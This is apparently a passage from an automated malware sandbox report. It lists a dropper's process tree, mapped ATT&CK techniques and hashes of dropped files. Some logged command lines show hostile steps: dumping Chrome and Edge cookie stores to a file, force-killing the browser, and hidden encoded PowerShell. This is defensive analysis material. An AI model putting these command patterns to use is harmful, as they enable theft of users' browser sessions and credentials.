                                                                                                      • Executes dropped EXE
                                                                                                      • Checks BIOS information in registry
                                                                                                      • Checks whether UAC is enabled
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      PID:2028
                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                        6⤵
                                                                                                          PID:492
                                                                                                      • C:\Users\Admin\Documents\JYv5GfoGxGfJOM0fMDq9BZw8.exe
                                                                                                        "C:\Users\Admin\Documents\JYv5GfoGxGfJOM0fMDq9BZw8.exe"
                                                                                                        5⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Checks BIOS information in registry
                                                                                                        • Checks whether UAC is enabled
                                                                                                        • Suspicious use of SetThreadContext
                                                                                                        PID:3692
                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                          6⤵
                                                                                                            PID:4044
                                                                                                        • C:\Users\Admin\Documents\bMr0OgxRtJUtKFwh6pZRITM5.exe
                                                                                                          "C:\Users\Admin\Documents\bMr0OgxRtJUtKFwh6pZRITM5.exe"
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Checks computer location settings
                                                                                                          PID:4604
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
                                                                                                            6⤵
                                                                                                              PID:1352
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                cmd
                                                                                                                7⤵
                                                                                                                  PID:3112
                                                                                                            • C:\Users\Admin\Documents\HoWYH7VmS6jOPreitfC_HkMp.exe
                                                                                                              "C:\Users\Admin\Documents\HoWYH7VmS6jOPreitfC_HkMp.exe"
                                                                                                              5⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Checks computer location settings
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:648
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\0cd8faea-78b4-4f3b-81d1-85584b582cc0.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\0cd8faea-78b4-4f3b-81d1-85584b582cc0.exe"
                                                                                                                6⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:4076
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c zaiqa_6.exe
                                                                                                          3⤵
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:4104
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS850EE5BD\zaiqa_6.exe
                                                                                                            zaiqa_6.exe
                                                                                                            4⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:4392
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c zaiqa_5.exe
                                                                                                          3⤵
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:4820
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS850EE5BD\zaiqa_5.exe
                                                                                                            zaiqa_5.exe
                                                                                                            4⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:3688
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-QF0KU.tmp\zaiqa_5.tmp
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-QF0KU.tmp\zaiqa_5.tmp" /SL5="$40118,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS850EE5BD\zaiqa_5.exe"
                                                                                                              5⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Loads dropped DLL
                                                                                                              PID:3156
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c zaiqa_4.exe
                                                                                                          3⤵
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:3152
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS850EE5BD\zaiqa_4.exe
                                                                                                            zaiqa_4.exe
                                                                                                            4⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of SetThreadContext
                                                                                                            PID:3516
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS850EE5BD\zaiqa_4.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\7zS850EE5BD\zaiqa_4.exe
                                                                                                              5⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:1144
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS850EE5BD\zaiqa_4.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\7zS850EE5BD\zaiqa_4.exe
                                                                                                              5⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:1448
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c zaiqa_3.exe
                                                                                                          3⤵
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:2584
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS850EE5BD\zaiqa_3.exe
                                                                                                            zaiqa_3.exe
                                                                                                            4⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Modifies system certificate store
                                                                                                            PID:2016
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c zaiqa_2.exe
                                                                                                          3⤵
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:2532
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS850EE5BD\zaiqa_2.exe
                                                                                                            zaiqa_2.exe
                                                                                                            4⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Checks SCSI registry key(s)
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                            PID:4112
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c zaiqa_1.exe
                                                                                                          3⤵
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:2504
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS850EE5BD\zaiqa_1.exe
                                                                                                            zaiqa_1.exe
                                                                                                            4⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Checks computer location settings
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:1176
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS850EE5BD\zaiqa_1.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\7zS850EE5BD\zaiqa_1.exe" -a
                                                                                                              5⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:1104
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c zaiqa_8.exe
                                                                                                          3⤵
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:4332
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS850EE5BD\zaiqa_8.exe
                                                                                                            zaiqa_8.exe
                                                                                                            4⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:4704
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              cmd.exe /c taskkill /f /im chrome.exe
                                                                                                              5⤵
                                                                                                                PID:448
                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                  taskkill /f /im chrome.exe
                                                                                                                  6⤵
                                                                                                                  • Kills process with taskkill
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:4964
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c zaiqa_9.exe
                                                                                                            3⤵
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:4036
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS850EE5BD\zaiqa_9.exe
                                                                                                              zaiqa_9.exe
                                                                                                              4⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                              PID:4348
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                5⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:1696
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                5⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:2028
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                5⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:3964
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                5⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:920
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                5⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:4676
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                5⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:3972
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                5⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:2616
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                5⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:4384
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2092 -ip 2092
                                                                                                        1⤵
                                                                                                          PID:3904
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4860 -ip 4860
                                                                                                          1⤵
                                                                                                            PID:4780
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2088 -ip 2088
                                                                                                            1⤵
                                                                                                              PID:1776
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2088 -s 544
                                                                                                              1⤵
                                                                                                              • Program crash
                                                                                                              PID:5020
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4724 -ip 4724
                                                                                                              1⤵
                                                                                                                PID:4884
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2092 -ip 2092
                                                                                                                1⤵
                                                                                                                  PID:2720
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4860 -ip 4860
                                                                                                                  1⤵
                                                                                                                    PID:1740
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1868 -ip 1868
                                                                                                                    1⤵
                                                                                                                      PID:1720
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4860 -ip 4860
                                                                                                                      1⤵
                                                                                                                        PID:3084
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4860 -ip 4860
                                                                                                                        1⤵
                                                                                                                          PID:1404
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3856 -ip 3856
                                                                                                                          1⤵
                                                                                                                            PID:4472
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1248 -ip 1248
                                                                                                                            1⤵
                                                                                                                              PID:1824
                                                                                                                            • C:\Windows\SysWOW64\fsjsgaib\oxxvzpwh.exe
                                                                                                                              C:\Windows\SysWOW64\fsjsgaib\oxxvzpwh.exe /d"C:\Users\Admin\gbqmgigb.exe"
                                                                                                                              1⤵
                                                                                                                                PID:1928
                                                                                                                                • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                  svchost.exe
                                                                                                                                  2⤵
                                                                                                                                    PID:4128
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 540
                                                                                                                                    2⤵
                                                                                                                                    • Program crash
                                                                                                                                    PID:5420
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4860 -ip 4860
                                                                                                                                  1⤵
                                                                                                                                    PID:2452
                                                                                                                                  • C:\Windows\system32\WerFault.exe
                                                                                                                                    C:\Windows\system32\WerFault.exe -pss -s 184 -p 824 -ip 824
                                                                                                                                    1⤵
                                                                                                                                      PID:3676
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1248 -ip 1248
                                                                                                                                      1⤵
                                                                                                                                        PID:1548
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1928 -ip 1928
                                                                                                                                        1⤵
                                                                                                                                          PID:5220
                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                          1⤵
                                                                                                                                            PID:5428
                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1248 -ip 1248
                                                                                                                                            1⤵
                                                                                                                                              PID:5560
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4860 -ip 4860
                                                                                                                                              1⤵
                                                                                                                                                PID:5572

                                                                                                                                              Network

                                                                                                                                              MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                              Execution

                                                                                                                                              Scheduled Task

                                                                                                                                              1
                                                                                                                                              T1053

                                                                                                                                              Persistence

                                                                                                                                              Modify Existing Service

                                                                                                                                              2
                                                                                                                                              T1031

                                                                                                                                              New Service

                                                                                                                                              1
                                                                                                                                              T1050

                                                                                                                                              Scheduled Task

                                                                                                                                              1
                                                                                                                                              T1053

                                                                                                                                              Privilege Escalation

                                                                                                                                              New Service

                                                                                                                                              1
                                                                                                                                              T1050

                                                                                                                                              Scheduled Task

                                                                                                                                              1
                                                                                                                                              T1053

                                                                                                                                              Defense Evasion

                                                                                                                                              Modify Registry

                                                                                                                                              2
                                                                                                                                              T1112

                                                                                                                                              Disabling Security Tools

                                                                                                                                              1
                                                                                                                                              T1089

                                                                                                                                              Virtualization/Sandbox Evasion

                                                                                                                                              1
                                                                                                                                              T1497

                                                                                                                                              Install Root Certificate

                                                                                                                                              1
                                                                                                                                              T1130

                                                                                                                                              Credential Access

                                                                                                                                              Credentials in Files

                                                                                                                                              1
                                                                                                                                              T1081

                                                                                                                                              Discovery

                                                                                                                                              Query Registry

                                                                                                                                              4
                                                                                                                                              T1012

                                                                                                                                              Virtualization/Sandbox Evasion

                                                                                                                                              1
                                                                                                                                              T1497

                                                                                                                                              System Information Discovery

                                                                                                                                              5
                                                                                                                                              T1082

                                                                                                                                              Peripheral Device Discovery

                                                                                                                                              1
                                                                                                                                              T1120

                                                                                                                                              Collection

                                                                                                                                              Data from Local System

                                                                                                                                              1
                                                                                                                                              T1005

                                                                                                                                              Command and Control

                                                                                                                                              Web Service

                                                                                                                                              1
                                                                                                                                              T1102

                                                                                                                                              Replay Monitor

                                                                                                                                              Loading Replay Monitor...

                                                                                                                                              Downloads

                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
                                                                                                                                                MD5

                                                                                                                                                54e9306f95f32e50ccd58af19753d929

                                                                                                                                                SHA1

                                                                                                                                                eab9457321f34d4dcf7d4a0ac83edc9131bf7c57

                                                                                                                                                SHA256

                                                                                                                                                45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72

                                                                                                                                                SHA512

                                                                                                                                                8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
                                                                                                                                                MD5

                                                                                                                                                9024a0d2c09cf1af99a3d17860ef178e

                                                                                                                                                SHA1

                                                                                                                                                49d17dadd83c707b357e47ae3a3a27b229ffbcde

                                                                                                                                                SHA256

                                                                                                                                                f0cbe7bcfa2bc465449d10be17da8942356f2f9f4feefe30a72f0d347d2c7871

                                                                                                                                                SHA512

                                                                                                                                                973f59a09e730d156609e8156f506a2782bf8fa7a81fc2b816601af8dcbe84a45e4ab0e3d15501e6345c051aaa5a561c1fd46049cbda012a401eff1444e1198a

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS850EE5BD\libcurl.dll
                                                                                                                                                MD5

                                                                                                                                                d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                SHA1

                                                                                                                                                028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                SHA256

                                                                                                                                                0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                SHA512

                                                                                                                                                857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS850EE5BD\libcurl.dll
                                                                                                                                                MD5

                                                                                                                                                d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                SHA1

                                                                                                                                                028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                SHA256

                                                                                                                                                0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                SHA512

                                                                                                                                                857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS850EE5BD\libcurlpp.dll
                                                                                                                                                MD5

                                                                                                                                                e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                SHA1

                                                                                                                                                b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                SHA256

                                                                                                                                                43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                SHA512

                                                                                                                                                9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS850EE5BD\libcurlpp.dll
                                                                                                                                                MD5

                                                                                                                                                e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                SHA1

                                                                                                                                                b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                SHA256

                                                                                                                                                43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                SHA512

                                                                                                                                                9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS850EE5BD\libgcc_s_dw2-1.dll
                                                                                                                                                MD5

                                                                                                                                                9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                SHA1

                                                                                                                                                64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                SHA256

                                                                                                                                                59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                SHA512

                                                                                                                                                0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS850EE5BD\libgcc_s_dw2-1.dll
                                                                                                                                                MD5

                                                                                                                                                9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                SHA1

                                                                                                                                                64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                SHA256

                                                                                                                                                59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                SHA512

                                                                                                                                                0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS850EE5BD\libgcc_s_dw2-1.dll
                                                                                                                                                MD5

                                                                                                                                                9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                SHA1

                                                                                                                                                64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                SHA256

                                                                                                                                                59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                SHA512

                                                                                                                                                0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS850EE5BD\libgcc_s_dw2-1.dll
                                                                                                                                                MD5

                                                                                                                                                9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                SHA1

                                                                                                                                                64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                SHA256

                                                                                                                                                59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                SHA512

                                                                                                                                                0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS850EE5BD\libstdc++-6.dll
                                                                                                                                                MD5

                                                                                                                                                5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                SHA1

                                                                                                                                                8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                SHA256

                                                                                                                                                97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                SHA512

                                                                                                                                                666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS850EE5BD\libstdc++-6.dll
                                                                                                                                                MD5

                                                                                                                                                5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                SHA1

                                                                                                                                                8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                SHA256

                                                                                                                                                97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                SHA512

                                                                                                                                                666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS850EE5BD\libwinpthread-1.dll
                                                                                                                                                MD5

                                                                                                                                                1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                SHA1

                                                                                                                                                fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                SHA256

                                                                                                                                                509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                SHA512

                                                                                                                                                3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS850EE5BD\libwinpthread-1.dll
                                                                                                                                                MD5

                                                                                                                                                1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                SHA1

                                                                                                                                                fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                SHA256

                                                                                                                                                509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                SHA512

                                                                                                                                                3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS850EE5BD\setup_install.exe
                                                                                                                                                MD5

                                                                                                                                                812d8f4aa0dc21b09833a96c2f41828a

                                                                                                                                                SHA1

                                                                                                                                                6d05110a2f2ef69aff7fc6b8159901c6712a1f89

                                                                                                                                                SHA256

                                                                                                                                                ea24189889c551c20b03b7a200f1e454ad86746cdc1e7a1f20bc2e46e0446571

                                                                                                                                                SHA512

                                                                                                                                                fadb87d15ffca46734868bdf9cfd119619de0ea87944ad2303e777d4d0f8d9544f3c4fea1821672048d8de97fe702280ff86c51dbd4152186a1e12f80def41aa

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS850EE5BD\setup_install.exe
                                                                                                                                                MD5

                                                                                                                                                812d8f4aa0dc21b09833a96c2f41828a

                                                                                                                                                SHA1

                                                                                                                                                6d05110a2f2ef69aff7fc6b8159901c6712a1f89

                                                                                                                                                SHA256

                                                                                                                                                ea24189889c551c20b03b7a200f1e454ad86746cdc1e7a1f20bc2e46e0446571

                                                                                                                                                SHA512

                                                                                                                                                fadb87d15ffca46734868bdf9cfd119619de0ea87944ad2303e777d4d0f8d9544f3c4fea1821672048d8de97fe702280ff86c51dbd4152186a1e12f80def41aa

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS850EE5BD\zaiqa_1.exe
                                                                                                                                                MD5

                                                                                                                                                3263859df4866bf393d46f06f331a08f

                                                                                                                                                SHA1

                                                                                                                                                5b4665de13c9727a502f4d11afb800b075929d6c

                                                                                                                                                SHA256

                                                                                                                                                9dcacda3913e30cafd92c909648b5bffde14b8e39e6adbfb15628006c0d4d3c2

                                                                                                                                                SHA512

                                                                                                                                                58205110a017f5d73dd131fefb1e3bbbcc670ed0c645aeefebe5281579c7b1dceffa56671cd7b186554bdb81710e21018ed0d7088a27517dfc5e48d6d3578cf6

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS850EE5BD\zaiqa_1.exe
                                                                                                                                                MD5

                                                                                                                                                3263859df4866bf393d46f06f331a08f

                                                                                                                                                SHA1

                                                                                                                                                5b4665de13c9727a502f4d11afb800b075929d6c

                                                                                                                                                SHA256

                                                                                                                                                9dcacda3913e30cafd92c909648b5bffde14b8e39e6adbfb15628006c0d4d3c2

                                                                                                                                                SHA512

                                                                                                                                                58205110a017f5d73dd131fefb1e3bbbcc670ed0c645aeefebe5281579c7b1dceffa56671cd7b186554bdb81710e21018ed0d7088a27517dfc5e48d6d3578cf6

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS850EE5BD\zaiqa_1.txt
                                                                                                                                                MD5

                                                                                                                                                3263859df4866bf393d46f06f331a08f

                                                                                                                                                SHA1

